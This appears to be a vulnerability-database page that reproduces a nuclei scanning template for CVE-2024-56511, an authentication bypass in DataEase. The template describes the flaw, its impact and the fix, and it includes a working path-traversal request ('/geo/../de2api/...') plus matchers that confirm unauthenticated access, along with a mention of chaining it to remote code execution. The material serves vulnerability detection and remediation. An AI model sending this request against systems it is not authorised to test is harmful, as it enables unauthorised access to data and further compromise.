Lucene search
+L

DataEase < 2.10.4 - Authentication Bypass via Whitelist Path Traversal

🗓️ 23 Jul 2026 05:50:12Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

DataEase versions up to and including 2.10.3 contain an authentication bypass in io.dataease.auth.filter.TokenFilter. The filter passes the raw, unnormalized request URI to WhitelistUtils.match(), which only checks for whitelisted prefixes such as...

Related
Refs
Code
id: CVE-2024-56511

info:
  name: DataEase < 2.10.4 - Authentication Bypass via Whitelist Path Traversal
  author: ChrisJr404
  severity: critical
  description: |
    DataEase versions up to and including 2.10.3 contain an authentication bypass in `io.dataease.auth.filter.TokenFilter`. The filter passes the raw, unnormalized request URI to `WhitelistUtils.match()`, which only checks for whitelisted prefixes such as `/geo/`, `/customGeo/`, `/map/`, `/oauth2/`, and `/websocket` without resolving `..` segments. By prepending a whitelisted prefix and traversing back into the configured `server.servlet.context-path`, an attacker bypasses the filter while Tomcat still routes the request to the genuine, protected controller. This collapses the entire `/de2api` surface (user management, datasources, dashboards, exports) into unauthenticated access.
  impact: |
    An unauthenticated attacker can reach every `/de2api` endpoint as if authenticated, exposing user management, datasource configuration, dashboards, and exports. Chained with CVE-2025-32966  (H2 JDBC RCE) the bypass becomes pre-auth remote code execution.
  remediation: |
    Upgrade to DataEase 2.10.4 or later, which normalizes the request path before whitelist matching.
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-9f69-p73j-m73x
    - https://nvd.nist.gov/vuln/detail/CVE-2024-56511
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-56511
    cwe-id: CWE-289
    epss-score: 0.00271
    epss-percentile: 0.50488
  metadata:
    verified: true
    max-request: 1
    vendor: dataease
    product: dataease
    shodan-query: http.title:"DataEase"
    fofa-query: title="DataEase"
  tags: cve,cve2024,dataease,auth-bypass,traversal

http:
  - raw:
      - |+
        GET /geo/../de2api/datasource/types HTTP/1.1
        Host: {{Hostname}}

    unsafe: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"code\":0", "mysql", "sqlServer", "oracle")'
        condition: and
# digest: 4b0a00483046022100b61702cfe2125eede69bb4f128f86d537f13f1bf950e19f95c574059ea44b75a022100c9859cc499649c1e8b196765a8a6702b6a31cb559027da73bf6e407fa0c7716a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 May 2026 17:17Current
8.4High risk
Vulners AI Score8.4
CVSS 3.19.8
CVSS 49.3
EPSS0.20883
SSVC
3